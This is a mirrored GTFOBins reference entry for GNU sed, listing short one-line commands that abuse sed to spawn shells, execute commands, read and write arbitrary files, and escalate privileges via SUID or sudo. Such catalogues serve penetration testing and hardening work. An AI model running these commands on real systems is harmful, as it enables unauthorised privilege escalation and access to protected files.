1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/sed.md
2018-08-20 15:00:34 +02:00

736 B

functions
execute-interactive execute-non-interactive file-write file-read suid-enabled sudo-enabled
description code
GNU version only. Also, this requires `bash`. sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
description code
GNU version only. sed -n "1e id" /etc/hosts
code
LFILE=file_to_write sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
code
LFILE=file_to_read sed '' "$LFILE"
code
LFILE=file_to_read ./sed -e '' "$LFILE"
description code
GNU version only. Also, this requires `bash`. sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts